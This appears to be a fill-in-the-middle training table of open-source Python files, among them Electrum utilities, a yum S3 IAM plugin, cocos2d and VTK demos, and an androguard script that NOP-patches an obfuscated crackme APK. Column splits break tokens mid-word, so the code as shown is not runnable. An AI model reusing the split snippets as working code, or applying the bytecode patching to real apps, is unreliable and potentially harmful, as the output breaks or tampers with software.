repo_name stringlengths 5 100 | path stringlengths 4 231 | language stringclasses 1 value | license stringclasses 15 values | size int64 6 947k | score float64 0 0.34 | prefix stringlengths 0 8.16k | middle stringlengths 3 512 | suffix stringlengths 0 8.17k |
|---|---|---|---|---|---|---|---|---|
awyrough/xsoccer | xsoccer/eventstatistics/migrations/0005_auto_20170112_2009.py | Python | mit | 461 | 0 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-01-12 20:09
from __future__ import unicode_literals
from django.db im | port migrations
class Migration(migrations.Migration):
dependencies = [
('eventstatistics', '0004_auto_20170112_2007'),
]
operations = [
migrations.RenameField(
model_name='eventstatistic',
old_name='relative_time',
new_name='relative_seconds',
| ),
]
|
Crypto-Expert/Electrum-obsolete | lib/util.py | Python | gpl-3.0 | 5,928 | 0.009447 | import os, sys, re, json
import platform
import shutil
from datetime import datetime
is_verbose = True
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
return super(MyEncoder, self).default(obj)
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def print_json(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
sys.stdout.write(s + "\n")
sys.stdout.flush()
def user_dir():
if "HOME" in os.environ:
return os.path.join(os.environ["HOME"], ".electrum")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum")
elif 'ANDROID_DATA' in os.environ:
return "/sdcard/electrum/"
else:
#raise Exception("No home directory found in environment variables.")
return
def appdata_dir():
"""Find the path to the application data directory; add an electrum folder and return path."""
if platform.system() == "Windows":
return os.path.join(os.environ["APPDATA"], "Electrum")
elif platform.system() == "Linux":
return os.path.join(sys.prefix, "share", "electrum")
elif (platform.system() == "Darwin" or
platform.system() == "DragonFly" or
platform.system() == "NetBSD"):
return "/Library/Application Support/Electrum"
else:
raise Exception("Unknown system")
def get_resource_path(*args):
return os.path.join(".", *args)
def local_data_dir():
"""Return path to the data folder."""
assert sys.argv
prefix_path = os.path.dirname(sys.argv[0])
local_data = os.path.join(prefix_path, "data")
return local_data
def format_satoshis(x, is_diff=False, num_zeros = 0, decimal_point = 8, whitespaces=False):
from decimal import Decimal
s = Decimal(x)
sign, digits, exp = s.as_tuple()
digits = map(str, digits)
while len(digits) < decimal_point + 1:
digits.insert(0,'0')
digits.insert(-decimal_point,'.')
s = ''.join(digits).rstrip('0')
if sign:
s = '-' + s
elif is_diff:
s = "+" + s
p = s.find('.')
s += "0"*( 1 + num_zeros - ( len(s) - p ))
if whitespaces:
s += " "*( 1 + decimal_point - ( len(s) - p ))
s = " "*( 13 - decimal_point - ( p )) + s
return s
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds ago" % remainder
if distance_in_seconds < 40:
return "half a minute ago"
elif distance_in_seconds < 60:
return "less than a minute ago"
else:
return "1 minute ago"
else:
if distance_in_minutes == 0:
return "less than a minute ago"
else:
return "1 minute ago"
elif distance_in_minutes < 45:
return "%s minutes ago" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour ago"
elif distance_in_minutes < 1440:
return "about % | d hours ago" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day ago"
elif distance_in_minutes < 43220:
return "%d days ago" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month ago"
elif distance_in_minutes < 525600:
return "%d months ago" % | (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year ago"
else:
return "over %d years ago" % (round(distance_in_minutes / 525600))
# URL decode
_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_url(url):
url = str(url)
o = url[8:].split('?')
address = o[0]
if len(o)>1:
params = o[1].split('&')
else:
params = []
amount = label = message = signature = identity = ''
for p in params:
k,v = p.split('=')
uv = urldecode(v)
if k == 'amount': amount = uv
elif k == 'message': message = uv
elif k == 'label': label = uv
elif k == 'signature':
identity, signature = uv.split(':')
url = url.replace('&%s=%s'%(k,v),'')
else:
print k,v
return address, amount, label, message, signature, identity, url
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import __builtin__
builtin_raw_input = __builtin__.raw_input
__builtin__.raw_input = raw_input
|
etingof/pysmi | pysmi/searcher/base.py | Python | bsd-2-clause | 405 | 0 | #
# This file is part of pysmi software.
#
# Copyright (c) 2015-2020, Ilya Etingof <etingof@gmail.com> |
# License: http://snmplabs.com/pysmi/license.html
#
class AbstractSearcher(object):
def setOptions(self, **kwargs):
for k in kwargs: |
setattr(self, k, kwargs[k])
return self
def fileExists(self, mibname, mtime, rebuild=False):
raise NotImplementedError()
|
egustafson/sandbox | Python/py-setup/ex_pkg1/__init__.py | Python | apache-2.0 | 110 | 0.036364 | #!/usr/bin/env python
print("Example package 1 in ex_pkg1/*")
## | Local Variables:
## mode: python
## End: | |
caspervg/pylex | src/pylex/lot.py | Python | mit | 4,510 | 0.001996 | from base64 import b64encode
import os
import requests
from .route import Route
class LotRoute(Route):
"""
Contains endpoints related to LEX lots
"""
def lot(self, id, user=True, dependencies=True, comments=True, votes=True, no_strip=False):
"""
Retrieve the lot with given identifier
:param id: Identifier of the lot to retrieve
:param user: Should user (authenticated) information be returned (e.g. last_downloaded)
:param dependencies: Should a dependency list be returned
:param comments: Should a list of comments be returned
:param votes: Should a list of votes be returned
:param no_strip: Should XML/HTML tags be stripped in the returned lot description
:return: Requested lot
:rtype: dict
"""
args = {}
if user:
args['user'] = 'true'
if dependencies: |
args['dependencies'] = 'true'
if comments:
args['comments'] = 'true'
if votes:
args['votes'] = 'true'
if no_strip:
args['nostrip'] = 'true'
return self._get_json('lot/{0}', id, | **args)
def all(self):
"""
Retrieve a concise list of all available lots
:return: List of all lots
:rtype: list
"""
return self._get_json('lot/all')
def download(self, id, directory):
"""
Download the file with given identifier to the given directory
:param id: Identifier of the lot to download
:param directory: Directory where the downloaded ZIP should be stored
:return: None
"""
url = (self._base + 'lot/{0}/download').format(id)
r = requests.get(url, auth=self._auth, stream=True)
file_name = r.headers['Content-Disposition'].split('"')[-2]
if len(directory) < 1:
return
with open(os.path.join(directory, file_name), 'wb') as file:
for chunk in r.iter_content(chunk_size=1024):
if chunk:
file.write(chunk)
file.flush()
def add(self, id):
"""
Add the lot with given identifier to the user's download (later) list
:param id: Identifier of the lot to add to the list
:return: None
"""
self._get('lot/{0}/download-list', id)
def rate(self, id, comment=None, vote=None):
"""
Add a rating (vote and/or comment) to the lot with given identifier
:param id: Identifier to add the rating to
:param comment: String with the comment to add. It should have len > 0 when entered.
:param vote: int with the vote to add. It should be greater than 0 and smaller than 4 when entered.
:return: Which elements were uploaded (list of 'rating' and/or 'comment')
:rtype: list
"""
rating = {}
if vote is not None:
if 1 <= vote <= 3:
rating['rating'] = vote
if comment is not None:
if len(comment) > 0:
rating['comment'] = comment
url = self._base + 'lot/{0}/comment'.format(id)
r = requests.post(url, auth=self._auth, params=rating)
r.raise_for_status()
return r.json()
def set_dependencies(self, id, internal=list(), external=list()):
"""
Sets the dependency string (for the LEX Dependency Tracker) for a lot.
Requires administrator access.
:param id: Identifier of the lot
:param internal: List of dependency identifiers for internal files (LEX lots) that the lot depends on
:param external: List of (name, link) tuples for external files (STEX, TSC, ...) that the lot depends on
:return: Created dependency string that was sent to the server, in plaintext and base64 encoded
:rtype: str
"""
dependency_str = 'NONE'
if len(internal) > 0 or len(external) > 0:
deps = internal
for (name, link) in external:
deps.append("{0}@{1}".format(name, link))
dependency_str = '$'.join(str(x) for x in deps)
params = {
'string': b64encode(dependency_str.encode('ascii'))
}
url = self._base + 'lot/{0}/dependency-string'.format(id)
r = requests.put(url, auth=self._auth, params=params)
r.raise_for_status()
return {
'plain': dependency_str,
'encoded': params['string']
}
|
jessedsmith/Arcte | modules/containers.py | Python | gpl-3.0 | 23,623 | 0.021297 | # -*- coding: utf-8 -*-
import os
import numpy as n
from collections import OrderedDict
from vtk import *
from qt4 import *
class Structure:
'''
Base class for all crystal baseStructs
'''
def __init__(self):
self.natoms = 0
self.composition = ''
self.system = ""
self.bravais = ""
self.schoenflies = ""
self.strukt = ""
self.herm_maug = ""
self.pearson = ""
self.number = 0
self.atom_coords = OrderedDict()
self.primitive_vectors = {}
self.volume = 0
self.reciprocal_vectors = {}
self.latt_basis_vectors = {}
self.name = ''
class BrailleWidget:
def __init__(self):
self.cyl = None
self.text = None
self.btext = None
self.dots = None
self.test = None
self.center = []
self.pt2 = []
self.radius = None
self.vect = []
self.uvect = []
self.dotsTransform=None
self.widgetText = ''
self.actors = []
self.sRadScale = 0.214
self.dRadScale = 0.162
self.trans = vtkTransform()
self.xrot = None
self.yrot = None
self.zrot = None
self.translateCenter = None
self.translateOffset = None
self.anDict = {'a':self.ary([[0,0]]),
'b':self.ary([[0,0],[1,0]]),
'c':self.ary([[0,0],[0,1]]),
'd':self.ary([[0,0],[0,1],[1,1]]),
'e':self.ary([[0,0],[1,1]]),
'f':self.ary([[0,0],[0,1],[1,0]]),
'g':self.ary([[0,0],[0,1],[1,0],[1,1]]),
'h':self.ary([[0,0],[1,0],[1,1]]),
| 'i':self.ary([[0,1],[1,0]]),
'j':self.ary([[1,0],[0,1],[1,1]]),
'k':self.ary([[0,0],[2,0]]),
'l':self.ary([[0,0],[1,0],[2,0]]),
'm':self.ary([[0,0],[0,1],[2,0]]),
'n':self.ary([[0,0],[0,1],[1,1],[2,0]]),
'o':self.ary([[0,0],[1,1],[2,0]]),
| 'p':self.ary([[0,0],[0,1],[1,0],[2,0]]),
'q':self.ary([[0,0],[0,1],[1,0],[1,1],[2,0]]),
'r':self.ary([[0,0],[1,0],[1,1],[2,0]]),
's':self.ary([[0,1],[1,0],[2,0]]),
't':self.ary([[0,1],[1,0],[1,1],[2,0]]),
'u':self.ary([[0,0],[2,0],[2,1]]),
'v':self.ary([[0,0],[1,0],[2,0],[2,1]]),
'w':self.ary([[0,1],[1,0],[1,1],[2,1]]),
'x':self.ary([[0,0],[0,1],[2,0],[2,1]]),
'y':self.ary([[0,0],[0,1],[1,1],[2,0],[2,1]]),
'z':self.ary([[0,0],[1,1],[2,0],[2,1]])}
self.uDict = {'a':"⠁",
'b':'⠃',
'c':'⠉',
'd':'⠙',
'e':'⠑',
'f':'⠋',
'g':'⠛',
'h':'⠓',
'i':'⠊',
'j':'⠚',
'k':'⠅',
'l':'⠇',
'm':'⠍',
'n':'⠝',
'o':'⠕',
'p':'⠏',
'q':'⠟',
'r':'⠗',
's':'⠎',
't':'⠞',
'u':'⠥',
'v':'⠧',
'w':'⠺',
'x':'⠭',
'y':'⠽',
'z':'⠵'}
sPos = n.sin(n.radians(45)) - self.sRadScale
dPosX = n.sin(n.arctan(4/3)) - self.dRadScale
dPosY = n.cos(n.arctan(4/3)) - self.dRadScale
self.sCharPos = n.array([[[-sPos , sPos],[sPos , sPos]],
[[-sPos , 0],[sPos , 0]],
[[-sPos , -sPos],[sPos , -sPos]]])
self.dCharPos = n.array([[[-dPosX,dPosY],[-dPosX/3.,dPosY],[dPosX/3.,dPosY],[dPosX,dPosY]],
[[-dPosX,0],[-dPosX/3.,0],[dPosX/3.,0],[dPosX,0]],
[[-dPosX,-dPosY],[-dPosX/3.,-dPosY],[dPosX/3.,-dPosY],[dPosX,-dPosY]]])
def ary(self,ones):
array = n.zeros((3,2))
for i in ones:
array[i[0],i[1]] = 1
return array
def setCenter(self,x,y,z):
self.center = n.array([x,y,z])
def setPt2(self,vals):
x = (vals[1] + vals[0])/2.
y = (vals[3] + vals[2])/2.
z = (vals[5] + vals[4])/2.
dist = n.sqrt((self.center[0]-x)**2 + (self.center[1]-y)**2 + (self.center[2]-z)**2)
self.uvect = n.array([x-self.center[0],y-self.center[1],z-self.center[2]])/dist
self.vect = self.uvect*self.radius*1.05
self.pt2 = self.center+self.vect
def setRadius(self,rad):
self.radius = rad
def setText(self,text):
self.text = text.strip()
def rotateX(self,rot):
self.xrot.SetElement(1, 1, n.cos(n.radians(-rot)))
self.xrot.SetElement(1, 2, n.sin(n.radians(-rot)))
self.xrot.SetElement(2, 1, -n.sin(n.radians(-rot)))
self.xrot.SetElement(2, 2, n.cos(n.radians(-rot)))
self.dots.Update()
self.cyl.Update()
def rotateY(self,rot):
self.yrot.SetElement(0,0,n.cos(n.radians(-rot)))
self.yrot.SetElement(0,2,-n.sin(n.radians(-rot)))
self.yrot.SetElement(2,0,n.sin(n.radians(-rot)))
self.yrot.SetElement(2,2,n.cos(n.radians(-rot)))
self.dots.Update()
self.cyl.Update()
def rotateZ(self,rot):
self.zrot.SetElement(0,0,n.cos(n.radians(-rot)))
self.zrot.SetElement(0,1,n.sin(n.radians(-rot)))
self.zrot.SetElement(1,0,-n.sin(n.radians(-rot)))
self.zrot.SetElement(1,1,n.cos(n.radians(-rot)))
self.dots.Update()
self.cyl.Update()
def setupCylinder(self):
if self.center.any() and self.radius and self.pt2.any():
line = vtkLineSource()
line.SetPoint1(self.center[0], self.center[1], self.center[2])
line.SetPoint2(self.pt2[0],self.pt2[1],self.pt2[2])
line.Update()
tube = vtkTubeFilter()
tube.SetRadius(self.radius*0.95)
tube.SetNumberOfSides(25)
tube.CappingOn()
tube.SetInputConnection(line.GetOutputPort())
tube.Update()
tri = vtkTriangleFilter()
tri.SetInputConnection(tube.GetOutputPort())
tri.Update()
self.cyl = tri
elif not self.center.any() or self.radius or self.pt2.any():
print "Center, radius, or second point not specified."
def setupDots(self):
self.dots = vtkAppendPolyData()
if len(self.text) == 1:
lRad = self.radius*0.95*self.sRadScale
array = self.radius*0.95*self.sCharPos
letArray = self.anDict[self.text.lower()]
array[:,:,0] *= letArray
array[:,:,1] *= letArray
for i,j in array:
if vtkVersion.GetVTKVersion() < 6.0:
if i[0] or i[1]:
self.dots.AddInput(self.addDot(i, lRad).GetOutput())
if j[0] or j[1]:
self.dots.AddInput(self.addDot(j, lRad).GetOutput())
self.btext = self.uDict[self.text.lower()].decode("utf-8")
elif vtkVersion.GetVTKVersion >= 6.0:
if i[0] or i[1]:
self.dots.AddInputData(self.addDot(i, lRad).GetOutput())
if j[0] or j[1]:
self.dots.AddInputData(self.addDot(j, lRad).GetOutput())
self.btext = self.uDict[self.text.lower()].decode("utf-8")
if len(self.text) == 2:
lRad = self.radius*0.95*self.dRadScale
array = self.radius*0.95*self.dCharPos
let1 = self.a |
shadowmint/nwidget | lib/cocos2d-0.5.5/samples/demo_flag3d.py | Python | apache-2.0 | 7,097 | 0.014231 | #
# cocos2d:
# http://cocos2d.org
#
# An example of how to generate a 3D scene manually
# Of course, the easiest way is to execute an Waves3D action,
# but this example is provided to show the
# 'internals' of generating a 3D effect.
#
import sys
import os
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..'))
import pyglet
from pyglet.gl import *
import cocos
from cocos.director import director
from cocos.euclid import Point2,Point3
import math
class Flag3D( cocos.layer.Layer ):
def __init__( self ):
super(Flag3D,self).__init__()
# load the image
self.image = pyglet.resource.image('flag.png')
# get the texture
self.texture = self.image.get_texture()
# get image size
x,y = self.image.width, self.image.height
# size of the grid: 20 x 20
# The image will be slipted in 20 squares x 20 tiles
self.grid_size = Point2(20,20)
# size of each tile
self.x_step = x / self.grid_size.x
self.y_step = y / self.grid_size.y
# calculate vertex, textures depending on image size
idx_pts, ver_pts_idx, tex_pts_idx = self._calculate_vertex_points()
# Generates an indexed vertex array with texture, vertex and color
# http://www.glprogramming.com/red/chapter02.html#name6
self.vertex_list = pyglet.graphics.vertex_list_in | dexed( (self.grid_size.x+1) * (self.grid_size.y+1),
idx_pts, "t2f", "v3f/stream","c4B")
self.vertex_list.vertices = ver_pts_idx # vertex points
self.vertex_list.tex_coords = tex_pts_idx # texels
self.vertex_list.colors = (255,255,255,255) * (self.grid_size.x+1) * (self.grid_size.y+1) # colors
# call the "step" method every frame when the lay | er is active
self.schedule(self.step)
def on_enter(self):
super(Flag3D,self).on_enter()
# hook on resize to override the default projection with a custom one.
# cocos2d's default projetion is also a 3d projection, but since this
# is a demo, we show how to customize our own on_resize method.
director.push_handlers(self.on_resize)
# the layer is on "stage"
self.elapsed = 0
def on_resize( self, width, height ):
# change the 2D projection to 3D
glViewport(0, 0, width, height)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluPerspective(90, 1.0*width/height, 0.1, 400.0)
glMatrixMode(GL_MODELVIEW)
def draw( self ):
super(Flag3D,self).draw()
glLoadIdentity()
# center the image
glTranslatef(-320, -240, -320.0)
# enable texture
glEnable(self.texture.target)
glBindTexture(self.texture.target, self.texture.id)
# draw the vertex array
self.vertex_list.draw(GL_TRIANGLES)
# disable the texture
glDisable(self.texture.target)
def step( self, dt ):
# move the z vertices with the sin(x+y) function
# to simulate a 3D flag effect
self.elapsed += dt
amplitud = 32
for i in range(0, self.grid_size.x+1):
for j in range(0, self.grid_size.y+1):
x,y,z = self.get_vertex(i,j)
z = (math.sin(self.elapsed*math.pi*2 + (y+x) * .01) * amplitud)
self.set_vertex( i,j, (x, y, z) )
def _calculate_vertex_points(self):
# generate the vertex array with the correct values
# size of the texture (power of 2)
w = float(self.image.width)/self.texture.tex_coords[3]
h = float(self.image.height)/self.texture.tex_coords[7]
index_points = []
vertex_points_idx = []
texture_points_idx = []
# generate 2 empty lists:
# vertex_list:
# texex_list:
for x in range(0,self.grid_size.x+1):
for y in range(0,self.grid_size.y+1):
vertex_points_idx += [-1,-1,-1]
texture_points_idx += [-1,-1]
# since we are using vertex_list_indexed we must calculate
# the index points
for x in range(0, self.grid_size.x):
for y in range(0, self.grid_size.y):
x1 = x * self.x_step
x2 = x1 + self.x_step
y1 = y * self.y_step
y2 = y1 + self.y_step
# d <-- c
# ^
# |
# a --> b
a = x * (self.grid_size.y+1) + y
b = (x+1) * (self.grid_size.y+1) + y
c = (x+1) * (self.grid_size.y+1) + (y+1)
d = x * (self.grid_size.y+1) + (y+1)
# we are generating 2 triangles: a-b-d, b-c-d
# (and not 1 quad, to prevent concave quads
# although this example can work OK with quads)
index_points += [ a, b, d, b, c, d]
l1 = ( a*3, b*3, c*3, d*3 )
l2 = ( Point3(x1,y1,0), Point3(x2,y1,0), Point3(x2,y2,0), Point3(x1,y2,0) )
# populate the vertex list
for i in range( len(l1) ):
vertex_points_idx[ l1[i] ] = l2[i].x
vertex_points_idx[ l1[i] + 1 ] = l2[i].y
vertex_points_idx[ l1[i] + 2 ] = l2[i].z
tex1 = ( a*2, b*2, c*2, d*2 )
tex2 = ( Point2(x1,y1), Point2(x2,y1), Point2(x2,y2), Point2(x1,y2) )
# populate the texel list
for i in range( len(l1) ):
texture_points_idx[ tex1[i] ] = tex2[i].x / w
texture_points_idx[ tex1[i] + 1 ] = tex2[i].y / h
return ( index_points, vertex_points_idx, texture_points_idx )
def set_vertex( self, x, y, v):
'''Set a vertex point is a certain value
:Parameters:
`x` : int
x-vertex
`y` : int
y-vertex
`v` : (int, int, int)
tuple value for the vertex
'''
idx = (x * (self.grid_size.y+1) + y) * 3
self.vertex_list.vertices[idx] = v[0]
self.vertex_list.vertices[idx+1] = v[1]
self.vertex_list.vertices[idx+2] = v[2]
def get_vertex( self, x, y):
'''Get the current vertex point value
:Parameters:
`x` : int
x-vertex
`y` : int
y-vertex
:rtype: (int,int,int)
'''
idx = (x * (self.grid_size.y+1) + y) * 3
x = self.vertex_list.vertices[idx]
y = self.vertex_list.vertices[idx+1]
z = self.vertex_list.vertices[idx+2]
return (x,y,z)
if __name__ == '__main__':
director.init()
# enable depth test
director.set_depth_test()
s = cocos.scene.Scene()
s.add( Flag3D() )
director.run( s )
|
jakbob/guitarlegend | songbuilder.py | Python | gpl-3.0 | 1,430 | 0.01958 | import getopt
import sys
import midi
#constants
keycodes = {1 : 64, #midi keycodes
2 : 59,
3 : 55,
4 : 50,
5 : 45,
6 : 40,
-1 : -1,} #flag for deletition
def rearange(infile, outfile):
#read infile
mid = midi.MidiFile()
mid.open(infile)
mid.read()
mid.close()
#rearange notes
for track in mid.tracks:
for event in track.events:
if event.type == "SEQUENCE_TRACK_NAME":
event.data = str(event.channel)
if hasattr(event, "pitch"):
for string, code in keycodes.iteritems():
if event.pitch >= code:
if code == -1:
del event #perhaps it helps...
else:
event.channel = string
event.track = string
break
#if event.channel == -1:
# tr | ack.events.remove(event)
#write new file
mid.open(outfile, "wb")
mid.write()
mid.close()
if __name__ == "__main__":
infile = outfile = None
optlist, args = getopt.getopt(sys.argv[1:], "i:o:")
for flag, value in optlist:
if flag == "-i":
infile = v | alue
elif flag == "-o":
outfile = value
if not (infile and outfile):
raise "Must specifile infile (-i) and outfile (-o)"
rearange(infile, outfile) |
mardix/pylot | pylot/app_templates/default/__init__.py | Python | mit | 8 | 0.125 |
# Pylo | t | |
mbrossard/yum-s3-iam | s3iam.py | Python | apache-2.0 | 9,027 | 0.000111 | #!/usr/bin/env python
# Copyright 2012, Julius Seporaitis
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__author__ = "Julius Seporaitis"
__email__ = "julius@seporaitis.net"
__copyright__ = "Copyright 2012, Julius Seporaitis"
__license__ = "Apache 2.0"
__version__ = "1.0.1"
import urllib2
import urlparse
import time
import hashlib
import hmac
import json
import yum
import yum.config
import yum.Errors
import yum.plugins
from yum.yumRepo import YumRepository
__all__ = ['requires_api_version', 'plugin_type', 'CONDUIT',
'config_hook', 'prereposetup_hook']
requires_api_version = '2.5'
plugin_type = yum.plugins.TYPE_CORE
CONDUIT = None
def config_hook(conduit):
yum.config.RepoConf.s3_enabled = yum.config.BoolOption(False)
yum.config.RepoConf.key_id = yum.config.Option()
yum.config.RepoConf.secret_key = yum.config.Option()
def prereposetup_hook(conduit):
"""Plugin initialization hook. Setup the S3 repositories."""
repos = conduit.getRepos()
for repo in repos.listEnabled():
if isinstance(repo, YumRepository) and repo.s3_enabled:
new_repo = S3Repository(repo.id, repo.baseurl)
new_repo.name = repo.name
# new_repo.baseurl = repo.baseurl
new_repo.mirrorlist = repo.mirrorlist
new_repo.basecachedir = repo.basecachedir
new_repo.gpgcheck = repo.gpgcheck
new_repo.gpgkey = repo.gpgkey
new_repo.key_id = repo.key_id
new_repo.secret_key = repo.secret_key
new_repo.proxy = repo.proxy
new_repo.enablegroups = repo.enablegroups
if hasattr(repo, 'priority'):
new_repo.priority = repo.priority
if hasattr(repo, 'base_persistdir'):
new_repo.base_persistdir = repo.base_persistdir
if hasattr(repo, 'metadata_expire'):
new_repo.metadata_expire = repo.metadata_expire
if hasattr(repo, 'skip_if_unavailable'):
new_repo.skip_if_unavailable = repo.skip_if_unavailable
repos.delete(repo.id)
repos.add(new_repo)
class S3Repository(YumRepository):
"""Repository object for Amazon S3, using IAM Roles."""
def __init__(self, repoid, baseurl):
super(S3Repository, self).__init__(repoid)
self.iamrole = None
self.baseurl = baseurl
self.grabber = None
self.enable()
@property
def grabfunc(self):
raise NotImplementedError("grabfunc called, when it shouldn't be!")
@property
def grab(self):
if not self.grabber:
self.grabber = S3Grabber(self)
if self.key_id and self.secret_key:
self.grabber.set_credentials(self.key_id, self.secret_key)
else:
self.grabber.get_role()
self.grabber.get_credentials()
return self.grabber
class S3Grabber(object):
def __init__(self, repo):
"""Initialize file grabber.
Note: currently supports only single repo.baseurl. So in case of a list
only the first item will be used.
"""
if isinstance(repo, basestring):
self.baseurl = repo
else:
if len(repo.baseurl) != 1:
raise yum.plugins.PluginYumExit("s3iam: repository '%s' "
"must have only one "
"'baseurl' value" % repo.id)
else:
self.baseurl = repo.baseurl[0]
# Ensure urljoin doesn't ignore base path:
if not self.baseurl.endswith('/'):
self.baseurl += '/'
def get_role(self):
"""Read IAM role from AWS metadata store."""
request = urllib2.Request(
urlparse.urljoin(
"http://169.254.169.254",
"/latest/meta-data/iam/security-credentials/"
))
response = None
try:
response = urllib2.urlopen(request)
self.iamrole = (response.read())
finally:
if response:
response.close()
def get_credentials(self):
"""Read IAM credentials from AWS metadata store.
Note: This method should be explicitly called after constructing new
object, as in 'explicit is better than implicit'.
"""
request = urllib2.Request(
urlparse.urljoin(
urlparse.urljoin(
"http://169.254.169.254/",
"latest/meta-data/iam/security-credentials/",
), self.iamrole))
response = None
try:
response = urllib2.urlopen(request)
data = json.loads(response.read())
finally:
if response:
response.close()
self.access_key = data['AccessKeyId']
self.secret_key = data['SecretAccessKey']
self.token = data['Token']
def set_credentials(self, access_key, secret_key):
self.access_key = access_key
self.secret_key = secret_key
self.token = None
def _request(self, path):
url = urlparse.urljoin(self.baseurl, urllib2.quote(path))
request = urllib2.Request(url)
if self.token:
request.add_header('x-amz-security-token', self.token)
signature = self.sign(request)
request.add_header('Authorization', "AWS {0}:{1}".format(
self.access_key,
signature))
return request
def urlgrab(self, url, filename=None, **kwargs):
"""urlgrab(url) copy | the file to the local filesystem."""
request = self._request(url)
if filename is None:
| filename = request.get_selector()
if filename.startswith('/'):
filename = filename[1:]
response = None
try:
out = open(filename, 'w+')
response = urllib2.urlopen(request)
buff = response.read(8192)
while buff:
out.write(buff)
buff = response.read(8192)
except urllib2.HTTPError, e:
# Wrap exception as URLGrabError so that YumRepository catches it
from urlgrabber.grabber import URLGrabError
new_e = URLGrabError(14, '%s on %s' % (e, url))
new_e.code = e.code
new_e.exception = e
new_e.url = url
raise new_e
finally:
if response:
response.close()
out.close()
return filename
def urlopen(self, url, **kwargs):
"""urlopen(url) open the remote file and return a file object."""
return urllib2.urlopen(self._request(url))
def urlread(self, url, limit=None, **kwargs):
"""urlread(url) return the contents of the file as a string."""
return urllib2.urlopen(self._request(url)).read()
def sign(self, request, timeval=None):
"""Attach a valid S3 signature to request.
request - instance of Request
"""
date = time.strftime("%a, %d %b %Y %H:%M:%S GMT", timeval or time.gmtime())
request.add_header('Date', date)
host = request.get_host()
# TODO: bucket name finding is ugly, I should find a way to support
# both naming conventions: http://bucket.s3.amazonaws.com/ and
# http://s3.amazonaws.com/bucket/
try:
pos = host.find(".s3")
assert pos != -1
bucket = host[:pos]
except AssertionError:
raise yum.plugins.PluginYumExit(
"s3iam: baseurl hostname should be in format: "
|
code4bones/androguard | demos/crackme_dexlabs_patch.py | Python | apache-2.0 | 1,566 | 0.028736 | #!/usr/bin/env python
import sys
PATH_INSTALL = "./"
sys.path.append(PATH_INSTALL)
from androguard.core.bytecodes import dvm
from androguard.core.bytecodes import apk
from androguard.core.analysis import analysis
from androguard.core import androconf
class Nop(dvm.Instruction10x):
def __init__(self):
self.OP = 0x00
def patch_dex( m ):
for i in m.get_methods():
if i.get_class_name() == "Lorg/dexlabs/poc/dexdropper/DropActivity;":
print i.get_class_name(), i.get_name()
patch_method_3( i )
# or
# patch_method_X( i )
def patch_method_1( method ):
buff = method.get_code().get_bc().insn
buff = "\x00" * 0x12 + buff[0x12:]
method.get_code().get_bc().insn = buff
def patch_method_2( method ):
method.set_code_idx( 0x12 )
instructions = [ j for j in method.get_instructions() ]
for j in range(0, 9):
instructions.insert(0, Nop() )
method.set_instructions( instructions )
def patch_method_3( method ):
method.set_code_idx( 0x12 )
instructions = [ j for j in method.get_instructions() ]
for j in range(0, 9):
instructions.insert(0, dvm.Instruction10 | x(None, "\x00\x00") )
method.set_instructions( instructions )
FILENAME_INPUT = "apks/crash/crackme-obfuscator.apk"
FILENAME_OUTPUT = "./toto.dex"
androconf.set_debug()
a = apk.APK( FILENAME_INPUT )
vm = dvm.DalvikVMFormat( a.get_dex() )
vmx = analysis.VMAnalysis( vm )
patch_dex( vm )
new_dex = vm.save()
wit | h open(FILENAME_OUTPUT, "w") as fd:
fd.write( new_dex )
|
sunfounder/SunFounder_Dragit | Dragit/Dragit/libs/modules/i2c_lcd.py | Python | gpl-2.0 | 2,054 | 0.055015 | #!/usr/bin/env python
import time
import smbus
BUS = smbus.SMBus(1)
def write_word(addr, data):
global BLEN
temp = data
if BLEN == 1:
temp |= 0x08
else:
temp &= 0xF7
BUS.write_byte(addr ,temp)
def send_command(comm):
# Send bit7-4 firstly
buf = comm & 0xF0
buf |= 0x04 # RS = 0, RW = 0, EN = 1
write_word(LCD_ADDR ,buf)
time.sleep(0.002)
buf &= 0xFB # Make EN = 0
write_word(LCD_ADDR ,buf)
# Send bit3-0 secondly
buf = (comm & 0x0F) << 4
buf |= 0x04 # RS = 0, RW = 0, EN = 1
write_word(LCD_ADDR ,buf)
time.sleep(0.002)
buf &= 0xFB # Make EN = 0
write_word(LCD_ADDR ,buf)
def send_data(data):
